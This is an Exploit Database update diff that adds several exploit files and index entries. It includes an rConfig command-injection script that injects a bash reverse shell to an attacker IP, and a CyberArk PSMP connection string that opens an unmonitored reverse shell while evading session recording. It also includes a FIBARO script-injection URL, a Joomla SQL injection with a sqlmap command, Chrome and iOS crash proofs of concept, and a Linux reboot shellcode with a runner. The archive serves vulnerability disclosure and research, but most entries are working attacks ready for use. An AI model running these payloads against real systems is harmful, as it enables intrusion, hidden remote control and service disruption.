DB: 2020-03-24

10 changes to exploits/shellcodes

ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)

CyberArk PSMP 10.9.1 - Policy Restriction Bypass

PHPMailer < 5.2.18 - Remote Code Execution (Bash)
FIBARO System Home Center 5.021 - Remote File Include
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection

Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)

exploits/ios/dos/48236.py

@@ -0,0 +1,24 @@
+# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
+# Author: Ivan Marmolejo
+# Date: 2020-03-22
+# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
+# Software Link: App Store for iOS devices
+# Tested Version: 5.0.25920
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.3
+
+Steps to Produce the Crash:
+1.- Run python code: ProficySCADA.py
+2.- Copy content to clipboard
+3.- Open "ProficySCADA for iOS"
+4.- Add
+5.- Username --> admin
+6.- Paste ClipBoard on "Password"
+7.- Add
+8.- Connect
+9.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 257
+print (buffer)

exploits/multiple/remote/48239.txt

@@ -0,0 +1,93 @@
+# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass
+# Google Dork: NA
+# Date: 2020-02-25
+# Exploit Author: LAHBAL Said
+# Vendor Homepage: https://www.cyberark.com/
+# Software Link: https://www.cyberark.com/
+# Version: PSMP <=10.9.1
+# Tested on: PSMP 10.9 & PSMP 10.9.1
+# CVE : N/A
+# Patched : PSMP >= 11.1
+
+[Prerequisites]
+
+Policy allows us to overwrite PSMRemoteMachine
+
+[Description]
+An issue was discovered in CyberArk Privileged Session Manager SSH Proxy
+(PSMP)
+through 10.9.1.
+All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be
+evaded
+because users entries are not properly validated.
+Commands executed in a reverse shell are not monitored.
+The connection process will freeze just after the "session is being
+recorded" banner and the all commands we enter are not monitored.
+
+------------------------------------------
+
+[Additional Information]
+We can got a reverse shell (or execute any command we want) from remote
+target and be completely invisible from CyberArk. In logs, we have only
+both PSMConnect and PSMDisconnect events.
+Here are details of the attack :
+1. I connect through CyberArk PSMP server using this
+connection string : ssh <vaultUserName>%username+address%'remoteMachine
+bash -i >& /dev/tcp/<AttackerIP>/<AttackerPort0>&1'@<psmpServer>
+Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >&
+/dev/tcp/192.168.0.10/443 0>&1'@psmp
+3. This connection string will :
+- Connect me to linux01 using sharedLinuxAccount account that is stored
+into CyberArk and to which I have access.
+- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is
+listening on port 443 for this test).
+4. The connection process will freeze just after "The sessions is being
+recorded" banner
+5. I got a reverse shell on which all commands ar not monitored.
+Note 1 : The command that created the reverse shell is NOT captured by
+CyberArk.
+Note 2 : sshd_config has been set with those parameters :
+PSMP_AdditionalDelimiter %
+PSMP_TargetAddressPortAdditionalDelimiter +
+
+------------------------------------------
+
+[VulnerabilityType Other]
+Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video)
+
+------------------------------------------
+
+[Vendor of Product]
+CyberArk
+
+------------------------------------------
+
+[Affected Product Code Base]
+PSMP - <=10.9.1
+
+------------------------------------------
+
+[Affected Component]
+/opt/CARKpsmp/bin/psmpserver
+
+------------------------------------------
+
+[Attack Type]
+Local
+
+------------------------------------------
+
+[CVE Impact Other]
+The vulnerability allow you to connect through CyberArk PSMP server
+bypassing all recordings mechanisms
+
+------------------------------------------
+
+[Attack Vectors]
+To exploit the vulnerability, someone must connect through PSMP using a
+crafted connection string.
+
+------------------------------------------
+
+[Has vendor confirmed or acknowledged the vulnerability?]
+true

exploits/multiple/webapps/48240.txt

@@ -0,0 +1,56 @@
+# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include
+# Date: 2020-03-22
+# Author: LiquidWorm
+# Vendor: https://www.fibaro.com
+# CVE: N/A
+
+Vendor: FIBAR GROUP S.A.
+Product web page: https://www.fibaro.com
+Affected version: Home Center 3, Home Center 2, Home Center Lite
+                  5.021.38
+                  4.580
+                  4.570
+                  4.540
+                  4.530
+                  4.510
+                  4.180
+
+
+Summary: Imagine that you live in a house where everything happens by itself.
+FIBARO Smart Home takes care of your everyday comfort and safety of all family
+members and in the meantime, saves energy on every single occasion. All this is
+possible thanks to Home Center 2 smart home HUB. Home Center 2 is an indispensable
+part of the FIBARO System without which the rest devices of home automation would
+be only beautiful objects. The smart home HUB collects and analyzes information
+about devices, communicates them with each other and thus directs the operation
+of the entire system and takes care of its security.
+
+Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting
+triggered via a Remote File Inclusion issue by including arbitrary client-side
+dynamic scripts (JavaScript, VBScript) due to the undocumented proxy API and its
+url GET parameter. This allows hijacking the current session of the user or
+changing the look of the page by changing the HTML.
+
+Tested on: Apache/2.2.16 (Debian)
+           nginx/1.9.5
+           nginx/1.8.0
+           lighttpd/1.4.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5563
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php
+
+
+04.02.2020
+
+--
+
+
+http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg
+
+$ cat /pentest/XSS.svg
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

exploits/php/webapps/48241.py

@@ -0,0 +1,54 @@
+# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
+# Date: 2020-03-21
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.rconfig.com
+# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Version: rConfig 3.9.4
+# Tested on: Cent OS 7 (1908)
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+if len(sys.argv) != 6:
+    print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port")
+    exit()
+
+host = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+attacker_ip = sys.argv[4]
+attacker_port = sys.argv[5]
+
+login_url = host + "/lib/crud/userprocess.php"
+payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port)
+encoded_payload = urllib.parse.quote_plus(payload)
+
+
+def exploit():
+    s = requests.Session()
+
+    res = s.post(
+        login_url,
+        data={
+            'user': username,
+            'pass': password,
+            'sublogin': 1
+        },
+        verify=False,
+        allow_redirects=True
+    )
+
+    injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload)
+    res = s.get(injection_url, verify=False)
+
+    if res.status_code != 200:
+        print("[~] Failed to connect")
+
+
+if __name__ == '__main__':
+    exploit()

exploits/php/webapps/48242.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
+# Dork: inurl:"index.php?option=com_hdwplayer"
+# Date: 2020-03-23
+# Exploit Author: qw3rTyTy
+# Vendor Homepage: https://www.hdwplayer.com/
+# Software Link: https://www.hdwplayer.com/download/
+# Version: 4.2
+# Tested on: Debian/Nginx/Joomla! 3.9.11
+
+##########################################################################
+#Vulnerability details
+##########################################################################
+File: components/com_hdwplayer/models/search.php
+Func: HdwplayerModelSearch::getsearch
+Line: 33
+
+    16	class HdwplayerModelSearch extends HdwplayerModel {
+    ...snip...
+    30		function getsearch() {
+    31	        $db = JFactory::getDBO();	
+    32			$search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');		
+    33		$query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')";		//!!!
+    34	
+    35	        $db->setQuery($query);
+    36	        $output = $db->loadObjectList();		
+    37	        return($output);
+    38	    }
+    39		
+    40	}
+    41	
+    42	?>
+
+##########################################################################
+#PoC
+##########################################################################
+$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch

exploits/windows/dos/48237.txt

@@ -0,0 +1,82 @@
+# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2020-02-21
+# Exploit Author: Cem Onat Karagun of Diesec GmBH
+# Vendor Homepage: https://www.google.com/
+# Version: Google Chrome 80.0.3987.87
+# Tested on: Windows x64 / Linux Debian x64 / MacOS
+# CVE: CVE-2020-6404
+# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8
+# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256
+
+Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0x7f2cbf9ad700 (LWP 3275)]
+[----------------------------------registers-----------------------------------]
+RAX: 0x7f2cbe98d100 --> 0x41b58ab3
+RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
+RCX: 0x1fffffffffffffff
+RDX: 0x7f2cbeb8bdf4 --> 0x0
+RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0
+RDI: 0x0
+RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 -->
+0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...)
+
+RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
+RIP: 0x559e50c11189 (<RangeFromBufferIndex()+377>: mov cl,BYTE PTR
+[rcx+0x7fff8000])
+R8 : 0xfffffffffffffff8
+R9 : 0x0
+R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('')
+R11: 0x7f2cbe98d100 --> 0x41b58ab3
+R12: 0xfe597d31a20 --> 0x0
+R13: 0x7f2cbeb8bde8 --> 0x0
+R14: 0x0
+R15: 0x2
+EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction
+OVERFLOW)
+[-------------------------------------code-------------------------------------]
+0x559e50c1117e <RangeFromBufferIndex()+366>: lea r8,[rdi-0x8]
+0x559e50c11182 <RangeFromBufferIndex()+370>: mov rcx,r8
+0x559e50c11185 <RangeFromBufferIndex()+373>: shr rcx,0x3
+=> 0x559e50c11189 <RangeFromBufferIndex()+377>: mov cl,BYTE PTR
+[rcx+0x7fff8000]
+0x559e50c1118f <RangeFromBufferIndex()+383>: test cl,cl
+0x559e50c11191 <RangeFromBufferIndex()+385>:
+jne 0x559e50c11418 <RangeFromBufferIndex()+1032>
+0x559e50c11197 <RangeFromBufferIndex()+391>: add
+rdi,0xffffffffffffffff
+0x559e50c1119b <RangeFromBufferIndex()+395>: mov rcx,rdi
+[------------------------------------stack-------------------------------------]
+0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
+0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0
+0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0
+0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0
+0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0
+0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 -->
+0x602000098630 --> 0x200000003 --> 0x0
+
+0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0
+0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x0000559e50c11189 in MappingForIndex ()
+at
+../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450
+450
+../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No
+such file or directory.
+
+
+<!DOCTYPE html>
+<head>
+<script type="text/javascript">
+document.addEventListener("DOMContentLoaded", function(){
+find(decodeURIComponent('\uFFFC'));
+});
+</script>
+</head>
+<body>
+<legend></legend>
+</body>
+</html>

files_exploits.csv

@@ -6686,6 +6686,8 @@ id,file,description,date,author,type,platform,port
 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
 48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows,
 48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows,
+48236,exploits/ios/dos/48236.py,"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)",2020-03-23,"Ivan Marmolejo",dos,ios,
+48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18052,6 +18054,7 @@ id,file,description,date,author,type,platform,port
 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
 48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
 48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple,
+48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39294,7 +39297,7 @@ id,file,description,date,author,type,platform,port
 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
-40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
+40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
 40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php,
 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php,
 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php,
@@ -42486,3 +42489,6 @@ id,file,description,date,author,type,platform,port
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
 48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
+48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,
+48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
+48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,

files_shellcodes.csv

@@ -1015,5 +1015,6 @@ id,file,description,date,author,type,platform
 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
-48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
-48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
+48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
+48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
+48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux

shellcodes/linux/48243.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
+# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
+# Date: 2020-03-23
+# Author: Upayan a.k.a. slaeryan
+# Contact: upayansaha@icloud.com
+# SLAE: 1525
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Linux x86
+# CVE: N/A
+
+
+/*
+; Filename: reboot_polymorphic.nasm
+; Author: Upayan a.k.a. slaeryan
+; SLAE: 1525
+; Contact: upayansaha@icloud.com
+; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
+; Testing: ./reboot_polymorphic
+; Compile with: ./compile.sh reboot_polymorphic
+; Size of shellcode: 26 bytes
+
+global _start			
+
+section .text
+_start:
+	xor eax, eax                ; Clearing the EAX register
+    xor ebx, ebx                ; Clearing the EBX register
+    xor ecx, ecx                ; Clearing the ECX register
+    cdq                         ; Clearing the EDX register
+    mov al, 0x58                ; Loading syscall value = 0x58 for reboot in AL
+    mov ebx, 0xfee1dead         ; Loading magic 1 in EBX
+    mov ecx, 672274793          ; Loading magic 2 in ECX
+    mov edx, 0x1234567          ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
+    int 0x80                    ; Executing the reboot syscall
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}